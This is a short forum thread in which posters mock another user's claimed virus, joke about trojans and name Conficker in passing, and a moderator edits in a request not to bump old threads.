If you think this is a smart virus I'd love to see what you think of conficker, also this thing does absolutely nothing you say it does.

Stop trying to look at their javascript codes. They'll get mad and ofcourse they'll give you a trojan horse.
Nah, jokes :P Just so stupid to try giving other people viruses.

GoldenMerc thinks hes top stuff, hhgs was a fail.

Edited by Jordan (Forum Super Moderator): Please do not bump old threads

GoldenMerc thinks hes top stuff, hhgs was a fail.

Nice grave dig pal.